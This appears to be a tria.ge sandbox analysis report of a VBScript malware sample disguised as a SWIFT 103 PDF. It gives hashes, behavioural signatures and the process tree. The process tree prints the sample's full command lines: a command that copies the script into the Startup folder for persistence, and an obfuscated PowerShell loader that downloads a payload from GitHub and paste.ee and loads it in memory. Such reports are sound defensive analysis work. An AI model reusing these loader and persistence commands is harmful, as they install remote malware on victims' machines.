Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

SWIFT 103 ...df.vbs

windows7-x64

8

SWIFT 103 ...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04/10/2024, 09:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SWIFT 103 202406111301435660 110624-pdf.vbs

  • Size

    489KB

  • MD5

    b4ed8d97bb9132e15502eb005580d3e1

  • SHA1

    eb64b5bfbb04979d46b7f906394caadbe96e5c4f

  • SHA256

    df610fe1800c5c643599d46f147e0e0623b5523e54e3b0795f2e4e2be88ba952

  • SHA512

    d6446d9a7120f2460216c24ee92045d3a435d8987f38375bbae41a66022a03147b40b42174a838be0b73019147fe83e30708267cbc83f44199895a486f746e85

  • SSDEEP

    12288:+IM9DK7pKt0qbfzQ0mfRygWqa8kPDXwlvX+LHqDDuu++MZu+Df2OW6:+ImrsHflxw5

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202406111301435660 110624-pdf.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2160

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1GZXHMQ7DEY5U3OEOWNZ.temp
    Filesize

    7KB

    MD5

    c3fdfacb3704591a2f3f88fea592adc2

    SHA1

    ba59dbdcfff495c72e8d30fe597250ba5ca4455e

    SHA256

    18c37bb155ecd530bf7a4882b79b0f11c403e0863a7651b1ed2bfb5d7a38bab1

    SHA512

    69a763e0c4980c2a02a1a18c3b386820d6c9e694887168ded1361aef0626d1e1201e11ae8ac3998dc2067cd53398f90978fc935e7bdabcc7f0b328f3f0ada29a

    Download Submit

  • memory/2232-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2232-5-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2232-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2232-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2232-8-0x0000000001D20000-0x0000000001D28000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2232-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2232-13-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2232-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2232-6-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3000-20-0x0000000002790000-0x0000000002798000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3000-19-0x000000001B610000-0x000000001B8F2000-memory.dmp

    Filesize

    2.9MB

    Download